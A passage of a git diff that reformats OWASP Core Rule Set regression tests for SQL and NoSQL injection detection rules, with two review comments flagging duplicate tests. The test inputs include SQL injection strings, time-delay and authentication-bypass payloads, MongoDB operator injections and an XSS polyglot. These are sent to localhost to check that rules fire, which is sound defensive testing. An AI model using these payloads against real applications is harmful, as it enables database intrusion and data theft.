- method: GET - port: 80 - uri: "/get?test=select+if(x" - version: HTTP/1.0 - output: - log_contains: id "942170" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=select+if(x" + version: HTTP/1.0 + output: + log_contains: id "942170" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index b467c61d0..aba2a2cdc 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml 
@@ -2,136 +2,126 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942180.yaml tests: - - test_title: 942180-1 + - test_id: 1 desc: "basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/get?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - test_title: 942180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/get?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" - version: HTTP/1.0 - output: - log_contains: id "942251" - - test_title: 942251-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log_contains: id "942251" + - test_id: 2 desc: "Detects having injections negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=having%20fun" - version: HTTP/1.0 - output: - no_log_contains: id "942251" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=having%20fun" + version: HTTP/1.0 + output: + no_log_contains: id "942251" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index 08d6b996f..2752383ae 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml 
@@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, Christian Folini, azurit" description: None - enabled: true - name: 942260.yaml tests: - - test_title: 942260-1 + - test_id: 1 desc: "Basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something LIKE ' - uri: "/get?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/get?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log_contains: id "942260" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 812a06146..79bd21e70 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml 
@@ -2,38 +2,34 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942270.yaml tests: - - test_title: 942270-1 + - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" - - test_title: 942270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" + - test_id: 2 desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=Xunionselectfrom" - version: HTTP/1.0 - output: - log_contains: id "942270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 7608a7f2d..1da867fc0 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -2,39 +2,35 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942280.yaml tests: - - test_title: 942280-1 + - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" - - test_title: 942280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" + - test_id: 2 desc: "SQL Server waitfor delay attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942280" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942280" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index 82f810d9a..0de6db8f1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml 
@@ -2,160 +2,149 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 942290.yaml tests: - - test_title: 942290-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$ne]=2" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$ne]=2" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 2 desc: "basic MongoDB NOSQL injection attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_id: 3 desc: "basic MongoDB NOSQL injection attempts 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_id: 4 desc: "basic MongoDB NOSQL injection attempts 3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_id: 5 desc: "basic MongoDB NOSQL injection attempts 4" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$not": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$not": "foo"}' + version: "HTTP/1.1" + 
output: + log_contains: id "942290" + - test_id: 6 desc: "basic MongoDB NOSQL injection attempts 5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$nor": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$nor": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 7 desc: "basic MongoDB NOSQL injection attempts 6" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$where": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$where": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" + - test_id: 8 desc: "basic MongoDB NOSQL injection attempts 7" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$elemMatch": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$elemMatch": "foo"}' + version: "HTTP/1.1" 
+ output: + log_contains: id "942290" + - test_id: 9 desc: "basic MongoDB NOSQL injection attempts 8" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$text": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$text": "foo"}' + version: "HTTP/1.1" + output: + log_contains: id "942290" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f6a801990..d3f7b1634 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml 
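Review bot: `test_id: 3` and `test_id: 4` in this hunk send the same request — both use `uri: "/get/mongo/show.php?u_id[$regex]=2"` with identical headers and the same `log_contains` expectation, differing only in the desc suffix — so the renumbered test 4 adds no coverage. Since ids are being reassigned here anyway, either drop the duplicate or give test 4 a distinct case from the operators the file already covers. A smaller point of style: the file mixes `dest_addr: "127.0.0.1"` / `version: "HTTP/1.1"` with the unquoted `dest_addr: 127.0.0.1` / `version: HTTP/1.0` used elsewhere in the same hunk; both forms parse to strings, but one quoting convention per file reads better.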
@@ -2,57 +2,52 @@ meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" description: None - enabled: true - name: 942300.yaml tests: - - test_title: 942300-1 + - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_id: 2 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_id: 3 desc: "No false positives with for. 
Issue #2007" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=booked%20for%202021%28including%202020" - version: HTTP/1.0 - output: - no_log_contains: id "942300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + no_log_contains: id "942300" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 1e34f1e4f..d0e5ccb39 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml 
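Review bot: `test_id: 1` and `test_id: 2` are identical apart from the id — same desc, same `data: "var=) when 234 then&foo=bar"`, same `log_contains` expectation — so the second test duplicates the first and should be dropped or given a different variant. Both descs also carry a typo, `injectionss`; suggested `desc: "MySQL comments, conditions and ch(a)r injections"`.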
@@ -2,62 +2,57 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942310.yaml tests: - - test_title: 942310-1 + - test_id: 1 desc: | Chained SQL injection attempts 2/2. This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). This test now checks that no match occurs for something that would have matched the original expression. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - no_log_contains: id "942310" - - test_title: 942310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + no_log_contains: id "942310" + - test_id: 2 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" - version: HTTP/1.0 - output: - log_contains: id "942310" - - test_title: 942310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log_contains: id "942310" + - test_id: 3 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" - version: HTTP/1.0 - output: - log_contains: id "942310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log_contains: id "942310" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 94b3ae37f..d582ea30f 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml 
@@ -2,218 +2,203 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" description: None - enabled: true - name: 942320.yaml tests: - - test_title: 942320-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 5 desc: "Detects PostgreSQL data conversion with ::int" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=password::int" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=password::int" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 6 desc: "Detects PostgreSQL data conversion with ::bool" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 7 desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div(23,-2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_id: 8 desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" stages: - - stage: - input: - dest_addr: 
